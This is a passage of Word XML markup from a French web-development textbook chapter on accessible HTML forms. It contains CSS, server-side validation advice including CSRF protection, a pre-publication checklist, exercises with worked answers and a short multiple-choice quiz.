      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une présentation qui ne repose pas sur la couleur seule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.champ { display: grid; gap: .35rem; margin-bottom: 1.25rem; }</w:t>
        <w:br/>
        <w:t>.aide { color: #5b6770; font-size: .875rem; }</w:t>
        <w:br/>
        <w:t>.erreur { color: #a63a32; font-size: .875rem; }</w:t>
        <w:br/>
        <w:t>input[aria-invalid="true"] { border-color: #a63a32; border-width: 2px; }</w:t>
        <w:br/>
        <w:t>[required] &gt; label::after { content: " *"; color: #a63a32; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.6 Au-delà du HTML : ce que le serveur doit faire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le formulaire envoie des données non fiables par définition. Le serveur doit les valider, les normaliser et les protéger avant de les stocker ou de les afficher.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Valider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> chaque champ selon les mêmes règles, sans faire confiance au client.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Normaliser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : supprimer les espaces superflus, mettre en minuscules les adresses électroniques, convertir les dates au format ISO.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Limiter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la taille des envois et le nombre de tentatives.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Échapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les valeurs affichées pour éviter les injections.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Protéger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les formulaires par un jeton anti-CSRF et, si nécessaire, par un captcha discret.</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CSRF</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cross-Site Request Forgery : un site malveillant déclenche une requête authentifiée sur un autre site, à l'insu de l'utilisateur. Un jeton unique par session bloque cette attaque.</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CHECK-LIST AVANT PUBLICATION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Chaque champ a une étiquette visible.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Les champs obligatoires sont signalés par du texte, pas seulement par une couleur.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Les messages d'erreur indiquent la correction attendue.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 formulaire se remplit entièrement au clavier.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Les données sont validées une seconde fois côté serveur.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L'envoi affiche un état de chargement, puis un message de succès.</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formulaire fonctionne sans JavaScript : c'est le socle.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Chaque champ a une étiquette visible, jamais un simple placeholder.</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type de champ détermine le clavier et la validation native.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fieldset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>legend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> structurent les groupes de questions.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validation native aide l'utilisateur, elle ne sécurise rien.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message d'erreur dit quoi corriger, pas seulement qu'il y a une erreur.</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serveur revalide, normalise et protège systématiquement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le HTML est complet. Il est temps de lui donner une apparence : le chapitre suivant introduit CSS, la cascade et les premiers styles.</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8.1 — Formulaire de contact accessible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Construisez un formulaire de contact avec nom, adresse électronique, sujet et message.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Ajoutez les étiquettes, les types adaptés et l'autocomplétion.</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Rendez l'adresse électronique et le message obligatoires.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Ajoutez une aide sous le champ message indiquant la longueur maximale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 8.2 — Auditer un formulaire défaillant</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Voici un formulaire réel. Repérez six défauts et corrigez-les.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;input type="text" placeholder="Votre email"&gt;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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;label&gt;Nom&lt;/label&gt;&lt;input name="nom"&gt;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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="age"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour un âge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="tel"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour un téléphone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;button&gt;OK&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sans type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>6.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un message d'erreur « Champ invalide »</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 8.3 — Écrire la validation serveur correspondante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   CONCEPTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rédigez en pseudo-code les contrôles serveur du formulaire précédent.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Listez les règles par champ.</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Indiquez l'ordre des contrôles.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Précisez ce qui est renvoyé à l'utilisateur en cas d'échec.</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8.1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&lt;form action="/contact" method="post"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;fieldset&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;legend&gt;Votre message&lt;/legend&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="nom"&gt;Nom&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="nom" name="nom" type="text" autocomplete="name" required&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="email"&gt;Adresse électronique&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="email" name="email" type="email" autocomplete="email" required&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="sujet"&gt;Sujet&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;select id="sujet" name="sujet"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option value="info"&gt;Demande d'information&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option value="bug"&gt;Signaler un problème&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option value="autre"&gt;Autre&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/select&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="message"&gt;Message&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;textarea id="message" name="message" rows="6" maxlength="2000"</w:t>
        <w:br/>
        <w:t xml:space="preserve">              required aria-describedby="message-aide"&gt;&lt;/textarea&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p id="message-aide"&gt;2 000 caractères maximum.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/fieldset&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;Envoyer le message&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>autocomplete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accélère la saisie et améliore l'accessibilité cognitive. Les valeurs normalisées (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) ne sont pas arbitraires : elles sont reconnues par les navigateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'aide est reliée par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-describedby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Elle est annoncée avec le champ, sans être confondue avec l'étiquette.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 8.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>placeholder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne remplace pas une étiquette : ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>label for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'étiquette n'est pas associée : il manque </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un âge est un nombre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>type="number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un téléphone est un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>type="tel"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inputmode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adapté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sans type vaut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : précisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>type="submit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>« Champ invalide » n'aide pas : indiquez la règle et la correction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 8.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Règles : nom non vide, 2 à 80 caractères ; adresse électronique conforme et domaine résolvable (facultatif) ; sujet parmi une liste fermée ; message de 10 à 2 000 caractères.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ordre : vérifier la méthode et le jeton anti-CSRF, limiter la taille, normaliser, valider champ par champ, puis traiter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En cas d'échec : réponse 422 avec la liste des champs fautifs et un message par champ ; les valeurs saisies sont conservées pour ne pas obliger à tout retaper.</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 xml:space="preserve">Quel est le rôle de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;label for="x"&gt;</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Colorer le champ</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 xml:space="preserve">Associer un texte au champ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id="x"</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Valider le champ</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Envoyer le formulaire</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Quel type de champ déclenche un clavier numérique sur mobile pour un âge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text</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tel</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number</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range</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Pourquoi la validation HTML seule est-elle insuffisante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Elle est trop lente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Elle peut être contournée par une requête forgée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Elle ne fonctionne pas sur mobile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Elle nécessite JavaScript</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Quel attribut relie une aide à un champ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aria-label</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aria-describedby</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title</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placeholder</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Quelle méthode HTTP utiliser pour envoyer un mot de passe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GET</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POST</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PUT</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HEAD</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L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relie l'étiquette au champ d'identifiant correspondant, ce qui permet l'annonce par les lecteurs d'écran et le clic sur le texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
